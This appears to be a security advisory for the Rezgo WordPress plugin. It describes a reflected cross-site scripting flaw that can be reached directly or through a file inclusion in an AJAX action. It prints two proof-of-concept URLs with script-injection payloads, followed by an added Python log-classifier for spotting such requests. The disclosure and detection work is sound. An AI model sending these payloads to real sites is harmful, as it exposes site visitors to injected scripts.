The plugin does not sanitise and escape some parameters before outputting them back in a page, leading to Reflected Cross-Site Scripting, which can be exploited either via an LFI in an AJAX action or by calling the affected file directly.

Direct call:
https://example.com/wp-content/plugins/rezgo/rezgo/templates/default/frame_header.php?tags="><script>alert(`xss`)</script>

Via the LFI, once the plugin is configured (a dummy “Rezgo Company Code” and “Rezgo API Key” can be used in the “Account Information” settings section):
http://example.com/wp-admin/admin-ajax.php?action=rezgo&method=rezgo/templates/default/frame_header&tags="><script>alert(`xss`)</script>
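
To check web server logs for requests that reach the affected template by either route described above, the following added example (not part of the original advisory or the plugin's code) classifies access-log lines. The log lines, IP addresses and the `example_view` method value are constructed for illustration, and the sketch assumes the server logs the request line percent-encoded as the client sent it.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format; IPs are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-content/plugins/rezgo/rezgo/templates/default/frame_header.php?tags=%22%3E%3Cscript%3Ealert(%60xss%60)%3C/script%3E HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /wp-admin/admin-ajax.php?action=rezgo&method=rezgo/templates/default/frame_header&tags=%22%3E%3Cscript%3Ealert(%60xss%60)%3C/script%3E HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /wp-admin/admin-ajax.php?action=rezgo&method=example_view&tags=family HTTP/1.1" 200 900',
    '198.51.100.9 - - [01/Jan/2024:10:02:00 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 50',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
MARKUP_RE = re.compile(r'[<>"\']')  # characters that break out of an attribute or tag
TEMPLATE = "rezgo/templates/default/frame_header"  # path taken from the advisory


def classify(line):
    """Return None for unrelated requests, else the route used to reach the
    template, suffixed with ':markup-in-tags' when the decoded `tags`
    parameter contains HTML metacharacters."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values

    if url.path.endswith("/plugins/rezgo/" + TEMPLATE + ".php"):
        route = "direct"  # template requested as a standalone file
    elif (url.path.endswith("/wp-admin/admin-ajax.php")
          and params.get("action") == ["rezgo"]
          and any(TEMPLATE in value for value in params.get("method", []))):
        route = "ajax-include"  # template pulled in through the `method` parameter
    else:
        return None

    if any(MARKUP_RE.search(value) for value in params.get("tags", [])):
        return route + ":markup-in-tags"
    return route


if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(classify(entry), "<-", entry.split('"')[1][:70])
```

A hit on the `direct` route is worth reviewing even without markup in `tags`, since the template is not normally requested as a standalone file.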